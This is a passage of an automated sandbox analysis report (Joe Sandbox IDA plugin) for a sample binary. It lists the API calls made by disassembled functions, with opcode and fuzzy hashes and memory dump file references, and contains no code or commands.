                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                              • Opcode ID: a32c7d199a4756fe7d58a1cd0b2f0bd4eb0a346c61b6b0c06352bf3261b28ff0
                                                                                                                                                                                              • Instruction ID: 1355f83485488fde83d9d620eb437644b3dcc880c94db92bc4c93d973e7e306f
                                                                                                                                                                                              • Opcode Fuzzy Hash: a32c7d199a4756fe7d58a1cd0b2f0bd4eb0a346c61b6b0c06352bf3261b28ff0
                                                                                                                                                                                              • Instruction Fuzzy Hash: F5415AB0905B40DEE724CF398885AE6FBE5BF19310F544A2ED5FE83282CB356654DB10
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00FA13E1
                                                                                                                                                                                                • Part of subcall function 00FA5E37: __EH_prolog.LIBCMT ref: 00FA5E3C
                                                                                                                                                                                                • Part of subcall function 00FACE40: __EH_prolog.LIBCMT ref: 00FACE45
                                                                                                                                                                                                • Part of subcall function 00FAB505: __EH_prolog.LIBCMT ref: 00FAB50A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                              • Opcode ID: dfb70fe4737914e3c255c40a42de6a5ebed26a67a0f7084a9be519ca737ec0e7
                                                                                                                                                                                              • Instruction ID: 783bb2049cf963e01d905a790bcb49996722c0ca43777dbb023ce36fa4e8fa22
                                                                                                                                                                                              • Opcode Fuzzy Hash: dfb70fe4737914e3c255c40a42de6a5ebed26a67a0f7084a9be519ca737ec0e7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 344168B0905B409EE724DF398885AE6FBE5BF19310F544A2ED5FE83282CB356654DB10
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00FBB098
                                                                                                                                                                                                • Part of subcall function 00FA13DC: __EH_prolog.LIBCMT ref: 00FA13E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                              • Opcode ID: 95b5bea0468990eb1dc87b32f54d7d6dcb081ae4d629ac510e1520cee16cfc01
                                                                                                                                                                                              • Instruction ID: 5179c51ecbca2d008f57538ca52d4e4dd47a5638680718af0367d442d4ee4dd1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 95b5bea0468990eb1dc87b32f54d7d6dcb081ae4d629ac510e1520cee16cfc01
                                                                                                                                                                                              • Instruction Fuzzy Hash: 14316DB5C002499ECF15DFA9CD51AEEBBB4AF09304F10449EE409B7242D779AE04EF61
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00FCACF8
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 190572456-0
                                                                                                                                                                                              • Opcode ID: d826cff0e69b17bbf533149634be115ba625244c14ceca2ba2cde0c782dc16e8
                                                                                                                                                                                              • Instruction ID: cab7234203727824be2d80a485909ce8e05227629e47f82510d46a84cd1b9f1c
                                                                                                                                                                                              • Opcode Fuzzy Hash: d826cff0e69b17bbf533149634be115ba625244c14ceca2ba2cde0c782dc16e8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5811EB33A0162F5F9B22DE28DD42E5A73569B843387164215ED25AB244D630FC01A7D2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00FACE45
                                                                                                                                                                                                • Part of subcall function 00FA5E37: __EH_prolog.LIBCMT ref: 00FA5E3C
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                              • Opcode ID: 5d1ad105d5744f2ed9a8547ae9bf8f0e6166101198cf0a0c4eb8e146cea6d313
                                                                                                                                                                                              • Instruction ID: b94fde71ab87763c97d0257a5c4ddae311d23c49c7655156ef6f87e515f31dcb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d1ad105d5744f2ed9a8547ae9bf8f0e6166101198cf0a0c4eb8e146cea6d313
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6711C6B1A01244DEEB14DB79C9457EEB7E89F95300F10445EE446D3282DB7C4F04EBA2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                              • Opcode ID: fed80d16bfa7d38f28b9fd015b4ff2cd778f602bf7c796e71f68b991c411d5d1
                                                                                                                                                                                              • Instruction ID: 91261eda1543395993567d73dbee084c22f4e118e73246ade396f02a87cc7540
                                                                                                                                                                                              • Opcode Fuzzy Hash: fed80d16bfa7d38f28b9fd015b4ff2cd778f602bf7c796e71f68b991c411d5d1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 800169B3D00524ABCF12AF68CD81ADEB775BF8A750F054525F816B7152DA788D04E6A0
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FCB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00FC9813,00000001,00000364,?,00FC3F73,00000050,?,00FE1030,00000200), ref: 00FCB177
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCC4E5
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateHeap_free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 614378929-0
                                                                                                                                                                                              • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                                                                                              • Instruction ID: 20bfe9eb15d8c28393a9829fd6662d677ace7f134091ada8eed882b6c901ed95
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A01D6726003066BE335CE69DC86F6AFBEDEB85370F25051DE59883281EA30A905C764
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00FC9813,00000001,00000364,?,00FC3F73,00000050,?,00FE1030,00000200), ref: 00FCB177
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                              • Opcode ID: dcc5457013091b01754777a75a7836d05dae741e6239f7f1118bfbe314d51007
                                                                                                                                                                                              • Instruction ID: 78f80b3f3192aa8be306a7e2cb795a291f0c5c3c6107dc2edb40b5af4ed5ea54
                                                                                                                                                                                              • Opcode Fuzzy Hash: dcc5457013091b01754777a75a7836d05dae741e6239f7f1118bfbe314d51007
                                                                                                                                                                                              • Instruction Fuzzy Hash: 03F0B43AD0912767DB215B21AE1BF9F3748AB41770F1D811AB80896190CB26D905A6E0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00FC3C3F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 190572456-0
                                                                                                                                                                                              • Opcode ID: 3649c7fdf259223995c75621b566373336b702991bc73f35cca65000ab0034b6
                                                                                                                                                                                              • Instruction ID: 29b4a32759ac9472ee512b3e201ac30eebb583062f452bb9e9ad1368baa95f2a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3649c7fdf259223995c75621b566373336b702991bc73f35cca65000ab0034b6
                                                                                                                                                                                              • Instruction Fuzzy Hash: F8F0823660021B9FCF12CE68ED05F9E77D9AB41BB47148129FA15E6190DB31DA20F790
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FCCA2C,00000000,?,00FC6CBE,?,00000008,?,00FC91E0,?,?,?), ref: 00FC8E38
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                              • Opcode ID: 0c5043c56fdc5d015ff177aa1c656af5f146befda39297eab139c0bfc86d1b9d
                                                                                                                                                                                              • Instruction ID: dd6b22d21e0cdcc741c5d524a1a8d4325fe921cafd07c35c24d1910b4aaa0bce
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c5043c56fdc5d015ff177aa1c656af5f146befda39297eab139c0bfc86d1b9d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 65E06531A0621756DB7137E59F0BF9B76489B817F4F150119AC5897091CF65CC03B2E1
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00FA5AC2
                                                                                                                                                                                                • Part of subcall function 00FAB505: __EH_prolog.LIBCMT ref: 00FAB50A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                              • Opcode ID: 23508265a1812e8ad930abf5408f9d18cff963888b4a5d82e075a209cd71eda1
                                                                                                                                                                                              • Instruction ID: ce7f5296c6513b41277539f53f253494bd4b0bc6e518f487e96de53e89bffc24
                                                                                                                                                                                              • Opcode Fuzzy Hash: 23508265a1812e8ad930abf5408f9d18cff963888b4a5d82e075a209cd71eda1
                                                                                                                                                                                              • Instruction Fuzzy Hash: C2018C30810690DED729E7B8C8417DEFBB59F64304F54848EA45653283CFB81B08EBA2
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FAA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00FAA592,000000FF,?,?), ref: 00FAA6C4
                                                                                                                                                                                                • Part of subcall function 00FAA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00FAA592,000000FF,?,?), ref: 00FAA6F2
                                                                                                                                                                                                • Part of subcall function 00FAA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00FAA592,000000FF,?,?), ref: 00FAA6FE
                                                                                                                                                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00FAA598
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1464966427-0
                                                                                                                                                                                              • Opcode ID: bc869197020c82580f6de5cdfec89aa44a4b2de08fcd976dbc7a5d6e2dd581f3
                                                                                                                                                                                              • Instruction ID: b006183c0a69052f11978b1c9b0fc16349855fc93285040f953adb60260d84ad
                                                                                                                                                                                              • Opcode Fuzzy Hash: bc869197020c82580f6de5cdfec89aa44a4b2de08fcd976dbc7a5d6e2dd581f3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 34F05476409790AACB225BB48D047C67B905F1B331F048A49F1F952196C3655098EB23
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00FB0E3D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExecutionStateThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2211380416-0
                                                                                                                                                                                              • Opcode ID: ee8527453af6c3361cea6c213919f85d77df65b020e5d8d6c047937305a9390c
                                                                                                                                                                                              • Instruction ID: 3be75e8a28f14110e9f69809f6f03b701d91bb7492a6895ea2f59d8f6d1cf4c7
                                                                                                                                                                                              • Opcode Fuzzy Hash: ee8527453af6c3361cea6c213919f85d77df65b020e5d8d6c047937305a9390c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AD05B21A0109956DB11733B6C79BFF36069FC7331F0D0066F2459B193CE5C4886B672
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GdipAlloc.GDIPLUS(00000010), ref: 00FBA62C
                                                                                                                                                                                                • Part of subcall function 00FBA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00FBA3DA
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1915507550-0
                                                                                                                                                                                              • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                                                                              • Instruction ID: f7deff7928898b42c6cb4e445242ab4261037baebda745f880fbb43c8cc99fa9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 85D0C77161020976DF466B638C129EE7696EB40350F048125B841D5151EEB5D910B952
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • DloadProtectSection.DELAYIMP ref: 00FBE5E3
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DloadProtectSection
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2203082970-0
                                                                                                                                                                                              • Opcode ID: 31f6d51b4012333e84cfd0b9723f0e3c62612ec51ae8db21bfb0052bd070be5d
                                                                                                                                                                                              • Instruction ID: 0df52746a078a2593379588e8ad078a9cfc44f635f651e5ea5c96ab6852e64ad
                                                                                                                                                                                              • Opcode Fuzzy Hash: 31f6d51b4012333e84cfd0b9723f0e3c62612ec51ae8db21bfb0052bd070be5d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9ED0A9B04402448AD223EBAB9942FC43391B320B10F980001B1C8C1088CA78C080BF01
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00FB1B3E), ref: 00FBDD92
                                                                                                                                                                                                • Part of subcall function 00FBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FBB579
